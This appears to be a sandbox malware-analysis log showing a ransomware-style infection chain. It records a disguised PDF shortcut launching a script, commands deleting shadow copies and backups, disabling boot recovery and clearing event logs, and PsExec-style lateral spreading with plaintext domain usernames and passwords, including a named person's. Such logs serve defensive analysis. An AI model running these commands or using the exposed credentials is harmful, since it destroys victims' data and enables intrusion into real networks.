PID 1740 wrote to memory of 4264	1740	_ftf.exe	264
PID 1740 wrote to memory of 5108	1740	_ftf.exe	266
PID 1740 wrote to memory of 5108	1740	_ftf.exe	266
PID 1740 wrote to memory of 5108	1740	_ftf.exe	266
PID 1740 wrote to memory of 2620	1740	_ftf.exe	267
PID 1740 wrote to memory of 2620	1740	_ftf.exe	267
PID 1740 wrote to memory of 2620	1740	_ftf.exe	267
PID 1740 wrote to memory of 4220	1740	_ftf.exe	271
PID 1740 wrote to memory of 4220	1740	_ftf.exe	271
PID 1740 wrote to memory of 4220	1740	_ftf.exe	271
PID 1740 wrote to memory of 1044	1740	_ftf.exe	270
PID 1740 wrote to memory of 1044	1740	_ftf.exe	270
PID 1740 wrote to memory of 1044	1740	_ftf.exe	270
PID 1740 wrote to memory of 4544	1740	_ftf.exe	274
PID 1740 wrote to memory of 4544	1740	_ftf.exe	274
PID 1740 wrote to memory of 4544	1740	_ftf.exe	274
PID 1740 wrote to memory of 4592	1740	_ftf.exe	275
PID 1740 wrote to memory of 4592	1740	_ftf.exe	275
PID 1740 wrote to memory of 4592	1740	_ftf.exe	275
PID 1740 wrote to memory of 1388	1740	_ftf.exe	276
PID 1740 wrote to memory of 1388	1740	_ftf.exe	276
PID 1740 wrote to memory of 1388	1740	_ftf.exe	276
PID 1740 wrote to memory of 4288	1740	_ftf.exe	277
PID 1740 wrote to memory of 4288	1740	_ftf.exe	277
PID 1740 wrote to memory of 4288	1740	_ftf.exe	277
PID 1740 wrote to memory of 4580	1740	_ftf.exe	282
PID 1740 wrote to memory of 4580	1740	_ftf.exe	282
PID 1740 wrote to memory of 4580	1740	_ftf.exe	282
PID 1740 wrote to memory of 1168	1740	_ftf.exe	284
PID 1740 wrote to memory of 1168	1740	_ftf.exe	284
PID 1740 wrote to memory of 1168	1740	_ftf.exe	284
PID 1740 wrote to memory of 3408	1740	_ftf.exe	285
PID 1740 wrote to memory of 3408	1740	_ftf.exe	285
PID 1740 wrote to memory of 3408	1740	_ftf.exe	285
PID 1740 wrote to memory of 4708	1740	_ftf.exe	288
PID 1740 wrote to memory of 4708	1740	_ftf.exe	288
PID 1740 wrote to memory of 4708	1740	_ftf.exe	288
PID 1740 wrote to memory of 4720	1740	_ftf.exe	289
PID 1740 wrote to memory of 4720	1740	_ftf.exe	289
PID 1740 wrote to memory of 4720	1740	_ftf.exe	289
PID 1740 wrote to memory of 4748	1740	_ftf.exe	290
PID 1740 wrote to memory of 4748	1740	_ftf.exe	290
PID 1740 wrote to memory of 4748	1740	_ftf.exe	290
PID 1740 wrote to memory of 200	1740	_ftf.exe	294
PID 1740 wrote to memory of 200	1740	_ftf.exe	294
PID 1740 wrote to memory of 200	1740	_ftf.exe	294
PID 1740 wrote to memory of 4984	1740	_ftf.exe	297
PID 1740 wrote to memory of 4984	1740	_ftf.exe	297
PID 1740 wrote to memory of 4984	1740	_ftf.exe	297
PID 1740 wrote to memory of 4744	1740	_ftf.exe	296
PID 1740 wrote to memory of 4744	1740	_ftf.exe	296
PID 1740 wrote to memory of 4744	1740	_ftf.exe	296
PID 1740 wrote to memory of 4824	1740	_ftf.exe	298
PID 1740 wrote to memory of 4824	1740	_ftf.exe	298
PID 1740 wrote to memory of 4824	1740	_ftf.exe	298
PID 1740 wrote to memory of 4808	1740	_ftf.exe	301
PID 1740 wrote to memory of 4808	1740	_ftf.exe	301
PID 1740 wrote to memory of 4808	1740	_ftf.exe	301
PID 1740 wrote to memory of 5084	1740	_ftf.exe	304
PID 1740 wrote to memory of 5084	1740	_ftf.exe	304
PID 1740 wrote to memory of 5084	1740	_ftf.exe	304
PID 1740 wrote to memory of 4900	1740	_ftf.exe	306
PID 1740 wrote to memory of 4900	1740	_ftf.exe	306
PID 1740 wrote to memory of 4900	1740	_ftf.exe	306
PID 1740 wrote to memory of 1464	1740	_ftf.exe	307
PID 1740 wrote to memory of 1464	1740	_ftf.exe	307
PID 1740 wrote to memory of 1464	1740	_ftf.exe	307
PID 1740 wrote to memory of 4108	1740	_ftf.exe	308
PID 1740 wrote to memory of 4108	1740	_ftf.exe	308
PID 1740 wrote to memory of 4108	1740	_ftf.exe	308
PID 1740 wrote to memory of 4172	1740	_ftf.exe	312
PID 1740 wrote to memory of 4172	1740	_ftf.exe	312
PID 1740 wrote to memory of 4172	1740	_ftf.exe	312
PID 1740 wrote to memory of 2704	1740	_ftf.exe	313
PID 1740 wrote to memory of 2704	1740	_ftf.exe	313
PID 1740 wrote to memory of 2704	1740	_ftf.exe	313
PID 1740 wrote to memory of 5112	1740	_ftf.exe	314
PID 1740 wrote to memory of 5112	1740	_ftf.exe	314
PID 1740 wrote to memory of 5112	1740	_ftf.exe	314
PID 1740 wrote to memory of 3996	1740	_ftf.exe	315
PID 1740 wrote to memory of 3996	1740	_ftf.exe	315
PID 1740 wrote to memory of 3996	1740	_ftf.exe	315
PID 1740 wrote to memory of 4664	1740	_ftf.exe	320
PID 1740 wrote to memory of 4664	1740	_ftf.exe	320
PID 1740 wrote to memory of 4664	1740	_ftf.exe	320
PID 1740 wrote to memory of 4216	1740	_ftf.exe	322
PID 1740 wrote to memory of 4216	1740	_ftf.exe	322
PID 1740 wrote to memory of 4216	1740	_ftf.exe	322
PID 1740 wrote to memory of 4692	1740	_ftf.exe	324
PID 1740 wrote to memory of 4692	1740	_ftf.exe	324
PID 1740 wrote to memory of 4692	1740	_ftf.exe	324
PID 1740 wrote to memory of 4780	1740	_ftf.exe	325
PID 1740 wrote to memory of 4780	1740	_ftf.exe	325
PID 1740 wrote to memory of 4780	1740	_ftf.exe	325
PID 1740 wrote to memory of 4588	1740	_ftf.exe	328
PID 1740 wrote to memory of 4588	1740	_ftf.exe	328
PID 1740 wrote to memory of 4588	1740	_ftf.exe	328
PID 1740 wrote to memory of 4452	1740	_ftf.exe	329
PID 1740 wrote to memory of 4452	1740	_ftf.exe	329
PID 1740 wrote to memory of 4452	1740	_ftf.exe	329
PID 1740 wrote to memory of 4648	1740	_ftf.exe	330
PID 1740 wrote to memory of 4648	1740	_ftf.exe	330
PID 1740 wrote to memory of 4648	1740	_ftf.exe	330
PID 1740 wrote to memory of 4852	1740	_ftf.exe	334
PID 1740 wrote to memory of 4852	1740	_ftf.exe	334
PID 1740 wrote to memory of 4852	1740	_ftf.exe	334
PID 1740 wrote to memory of 212	1740	_ftf.exe	335
PID 1740 wrote to memory of 212	1740	_ftf.exe	335
PID 1740 wrote to memory of 212	1740	_ftf.exe	335
PID 1740 wrote to memory of 1376	1740	_ftf.exe	338
PID 1740 wrote to memory of 1376	1740	_ftf.exe	338
PID 1740 wrote to memory of 1376	1740	_ftf.exe	338
PID 1740 wrote to memory of 5012	1740	_ftf.exe	340
PID 1740 wrote to memory of 5012	1740	_ftf.exe	340
PID 1740 wrote to memory of 5012	1740	_ftf.exe	340
PID 1740 wrote to memory of 2676	1740	_ftf.exe	341
PID 1740 wrote to memory of 2676	1740	_ftf.exe	341
PID 1740 wrote to memory of 2676	1740	_ftf.exe	341
PID 1740 wrote to memory of 3672	1740	_ftf.exe	342
PID 1740 wrote to memory of 3672	1740	_ftf.exe	342
PID 1740 wrote to memory of 3672	1740	_ftf.exe	342
PID 1740 wrote to memory of 4224	1740	_ftf.exe	346
PID 1740 wrote to memory of 4224	1740	_ftf.exe	346
PID 1740 wrote to memory of 4224	1740	_ftf.exe	346
PID 1740 wrote to memory of 2164	1740	_ftf.exe	347
PID 1740 wrote to memory of 2164	1740	_ftf.exe	347
PID 1740 wrote to memory of 2164	1740	_ftf.exe	347
PID 1740 wrote to memory of 4276	1740	_ftf.exe	350
PID 1740 wrote to memory of 4276	1740	_ftf.exe	350
PID 1740 wrote to memory of 4276	1740	_ftf.exe	350
PID 1740 wrote to memory of 4296	1740	_ftf.exe	352
PID 1740 wrote to memory of 4296	1740	_ftf.exe	352
PID 1740 wrote to memory of 4296	1740	_ftf.exe	352
PID 1740 wrote to memory of 4116	1740	_ftf.exe	353
PID 1740 wrote to memory of 4116	1740	_ftf.exe	353
PID 1740 wrote to memory of 4116	1740	_ftf.exe	353
PID 1740 wrote to memory of 4608	1740	_ftf.exe	356
PID 1740 wrote to memory of 4608	1740	_ftf.exe	356
PID 1740 wrote to memory of 4608	1740	_ftf.exe	356
PID 1740 wrote to memory of 4628	1740	_ftf.exe	358
PID 1740 wrote to memory of 4628	1740	_ftf.exe	358
PID 1740 wrote to memory of 4628	1740	_ftf.exe	358
PID 1740 wrote to memory of 4796	1740	_ftf.exe	360
PID 1740 wrote to memory of 4796	1740	_ftf.exe	360
PID 1740 wrote to memory of 4796	1740	_ftf.exe	360
PID 1740 wrote to memory of 4432	1740	_ftf.exe	362
PID 1740 wrote to memory of 4432	1740	_ftf.exe	362
PID 1740 wrote to memory of 4432	1740	_ftf.exe	362
PID 1740 wrote to memory of 4672	1740	_ftf.exe	364
PID 1740 wrote to memory of 4672	1740	_ftf.exe	364
PID 1740 wrote to memory of 4672	1740	_ftf.exe	364
PID 1740 wrote to memory of 4940	1740	_ftf.exe	366
PID 1740 wrote to memory of 4940	1740	_ftf.exe	366
PID 1740 wrote to memory of 4940	1740	_ftf.exe	366
PID 1740 wrote to memory of 1796	1740	_ftf.exe	368
PID 1740 wrote to memory of 1796	1740	_ftf.exe	368
PID 1740 wrote to memory of 1796	1740	_ftf.exe	368
PID 1740 wrote to memory of 4696	1740	_ftf.exe	370
PID 1740 wrote to memory of 4696	1740	_ftf.exe	370
PID 1740 wrote to memory of 4696	1740	_ftf.exe	370
PID 1740 wrote to memory of 4732	1740	_ftf.exe	372
PID 1740 wrote to memory of 4732	1740	_ftf.exe	372
PID 1740 wrote to memory of 4732	1740	_ftf.exe	372
PID 1740 wrote to memory of 4148	1740	_ftf.exe	374
PID 1740 wrote to memory of 4148	1740	_ftf.exe	374
PID 1740 wrote to memory of 4148	1740	_ftf.exe	374
PID 1740 wrote to memory of 4960	1740	_ftf.exe	376
PID 1740 wrote to memory of 4960	1740	_ftf.exe	376
PID 1740 wrote to memory of 4960	1740	_ftf.exe	376
PID 1740 wrote to memory of 2316	1740	_ftf.exe	377
PID 1740 wrote to memory of 2316	1740	_ftf.exe	377
PID 1740 wrote to memory of 2316	1740	_ftf.exe	377
PID 1740 wrote to memory of 5088	1740	_ftf.exe	380
PID 1740 wrote to memory of 5088	1740	_ftf.exe	380
PID 1740 wrote to memory of 5088	1740	_ftf.exe	380
PID 1740 wrote to memory of 1580	1740	_ftf.exe	382
PID 1740 wrote to memory of 1580	1740	_ftf.exe	382
PID 1740 wrote to memory of 1580	1740	_ftf.exe	382
PID 1740 wrote to memory of 4228	1740	_ftf.exe	384
PID 1740 wrote to memory of 4228	1740	_ftf.exe	384
PID 1740 wrote to memory of 4228	1740	_ftf.exe	384
PID 1740 wrote to memory of 4600	1740	_ftf.exe	386
PID 1740 wrote to memory of 4600	1740	_ftf.exe	386
PID 1740 wrote to memory of 4600	1740	_ftf.exe	386
PID 1740 wrote to memory of 4156	1740	_ftf.exe	388
PID 1740 wrote to memory of 4156	1740	_ftf.exe	388
PID 1740 wrote to memory of 4156	1740	_ftf.exe	388
PID 1740 wrote to memory of 4668	1740	_ftf.exe	390
PID 1740 wrote to memory of 4668	1740	_ftf.exe	390
PID 1740 wrote to memory of 4668	1740	_ftf.exe	390
PID 1740 wrote to memory of 4516	1740	_ftf.exe	392
PID 1740 wrote to memory of 4516	1740	_ftf.exe	392
PID 1740 wrote to memory of 4516	1740	_ftf.exe	392
PID 1740 wrote to memory of 4348	1740	_ftf.exe	394
PID 1740 wrote to memory of 4348	1740	_ftf.exe	394
PID 1740 wrote to memory of 4348	1740	_ftf.exe	394
PID 1740 wrote to memory of 3932	1740	_ftf.exe	396
PID 1740 wrote to memory of 3932	1740	_ftf.exe	396
PID 1740 wrote to memory of 3932	1740	_ftf.exe	396
PID 1740 wrote to memory of 4444	1740	_ftf.exe	398
PID 1740 wrote to memory of 4444	1740	_ftf.exe	398
PID 1740 wrote to memory of 4444	1740	_ftf.exe	398
PID 1740 wrote to memory of 1192	1740	_ftf.exe	400
PID 1740 wrote to memory of 1192	1740	_ftf.exe	400
PID 1740 wrote to memory of 1192	1740	_ftf.exe	400
PID 1740 wrote to memory of 4876	1740	_ftf.exe	402
PID 1740 wrote to memory of 4876	1740	_ftf.exe	402
PID 1740 wrote to memory of 4876	1740	_ftf.exe	402
PID 1740 wrote to memory of 4992	1740	_ftf.exe	404
PID 1740 wrote to memory of 4992	1740	_ftf.exe	404
PID 1740 wrote to memory of 4992	1740	_ftf.exe	404
PID 1740 wrote to memory of 4860	1740	_ftf.exe	406
PID 1740 wrote to memory of 4860	1740	_ftf.exe	406
PID 1740 wrote to memory of 4860	1740	_ftf.exe	406
PID 1740 wrote to memory of 904	1740	_ftf.exe	408
PID 1740 wrote to memory of 904	1740	_ftf.exe	408
PID 1740 wrote to memory of 904	1740	_ftf.exe	408
PID 1740 wrote to memory of 4016	1740	_ftf.exe	410
PID 1740 wrote to memory of 4016	1740	_ftf.exe	410
PID 1740 wrote to memory of 4016	1740	_ftf.exe	410
PID 1740 wrote to memory of 5100	1740	_ftf.exe	412
PID 1740 wrote to memory of 5100	1740	_ftf.exe	412
PID 1740 wrote to memory of 5100	1740	_ftf.exe	412

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\f5f79e2169db3bbe7b7ae3ff4a0f40659d11051e69ee784f5469659a708e829e.lnk
1⤵
- Suspicious use of WriteProcessMemory
PID:1108
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c path=C:\Windows\system32&move "VerificationDocuments.pdf.lnk " "C:\Users\Admin\AppData\Local\Temp\1.lnk"&type "C:\Users\Admin\AppData\Local\Temp\1.lnk"|find "END2">"C:\Users\Admin\AppData\Local\Temp\0.js"&wscript "C:\Users\Admin\AppData\Local\Temp\0.js"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4004
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" type "C:\Users\Admin\AppData\Local\Temp\1.lnk""
    3⤵
    PID:3988
- - C:\Windows\system32\find.exe
    find "END2"
    3⤵
    PID:3288
- - C:\Windows\system32\wscript.exe
    wscript "C:\Users\Admin\AppData\Local\Temp\0.js"
    3⤵
    PID:3208

C:\Windows\PSEXESVC.exe
C:\Windows\PSEXESVC.exe
1⤵
- Suspicious use of WriteProcessMemory
PID:1352
- C:\Windows\_ftf.exe
  "_ftf.exe"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1740
- - C:\Windows\TEMP\vfrkl.exe
    123 \\.\pipe\280E9885-CDBC-4DAE-8FA4-2E26A1A5442E
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:412
- - C:\Windows\TEMP\_umx.exe
    "C:\Windows\TEMP\_umx.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3428
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c c:\Windows\system32\vssadmin.exe delete shadows /all /quiet
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3980
    - - \??\c:\Windows\system32\vssadmin.exe
        
        c:\Windows\system32\vssadmin.exe delete shadows /all /quiet
        5⤵
        Interacts with shadow copies
        
        PID:4000
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c wbadmin.exe delete catalog -quiet
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2164
    - - C:\Windows\system32\wbadmin.exe
        
        wbadmin.exe delete catalog -quiet
        5⤵
        Deletes backup catalog
        
        PID:3568
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
      4⤵
      PID:3732
    - - C:\Windows\system32\bcdedit.exe
        
        bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:3820
    - - C:\Windows\system32\bcdedit.exe
        
        bcdedit /set {default} recoveryenabled no
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:252
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c wevtutil.exe cl System
      4⤵
      PID:4116
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl System
        5⤵
        
        PID:4220
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c wevtutil.exe cl Security
      4⤵
      PID:4448
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl Security
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4664
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\igmp.mcast.net -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    - Executes dropped EXE
    PID:4088
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\Ewycradz -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    PID:2600
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\Ewycradz -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    PID:3908
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\Ewycradz -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    PID:3060
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\10.10.0.65 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    - Executes dropped EXE
    PID:2672
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\255.255.255.255 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    - Executes dropped EXE
    PID:3236
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\10.10.0.94 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    - Executes dropped EXE
    PID:3212
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\255.255.255.255 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    - Executes dropped EXE
    PID:1516
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\Ewycradz -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    PID:2632
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\224.0.0.22 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    - Executes dropped EXE
    PID:3120
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\10.10.0.255 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    - Executes dropped EXE
    PID:892
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\239.255.255.250 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    - Executes dropped EXE
    PID:496
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\Ewycradz -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    PID:1860
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\239.255.255.250 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    PID:1940
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\255.255.255.255 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    - Executes dropped EXE
    PID:2340
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\224.0.0.252 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    PID:4196
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\255.255.255.255 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    PID:4208
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\igmp.mcast.net -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    - Executes dropped EXE
    PID:4332
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\224.0.0.252 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    - Executes dropped EXE
    PID:4384
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\10.10.0.255 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    - Executes dropped EXE
    PID:4424
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\Ewycradz -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    - Executes dropped EXE
    PID:4536
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\224.0.0.22 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    - Executes dropped EXE
    PID:4604
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\255.255.255.255 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    - Executes dropped EXE
    PID:4716
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\igmp.mcast.net -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    PID:4728
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\255.255.255.255 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    PID:4816
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\224.0.0.22 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    - Executes dropped EXE
    PID:4828
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\Ewycradz -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    - Executes dropped EXE
    PID:4908
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\igmp.mcast.net -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    - Executes dropped EXE
    PID:5024
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\224.0.0.22 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    PID:5072
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\239.255.255.250 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    - Executes dropped EXE
    PID:1032
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\255.255.255.255 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    PID:2916
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\igmp.mcast.net -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    - Executes dropped EXE
    PID:1888
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\Ewycradz -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    - Executes dropped EXE
    PID:4152
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\239.255.255.250 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    PID:4212
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\255.255.255.255 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    PID:4300
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\224.0.0.22 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    - Executes dropped EXE
    PID:4308
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\igmp.mcast.net -u "MicrosoftOffice16_Data:SSPI:[email protected]\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    - Executes dropped EXE
    PID:4056
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\224.0.0.252 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    - Executes dropped EXE
    PID:4176
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\10.10.0.255 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    - Executes dropped EXE
    PID:4360
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\255.255.255.255 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    PID:4440
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\224.0.0.252 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    - Executes dropped EXE
    PID:4504
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\224.0.0.22 -u "MicrosoftOffice16_Data:SSPI:[email protected]\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    - Executes dropped EXE
    PID:4596
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\10.10.0.255 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    - Executes dropped EXE
    PID:4680
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\255.255.255.255 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    - Executes dropped EXE
    PID:4660
- - C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\igmp.mcast.net -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    3⤵
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    PID:4784
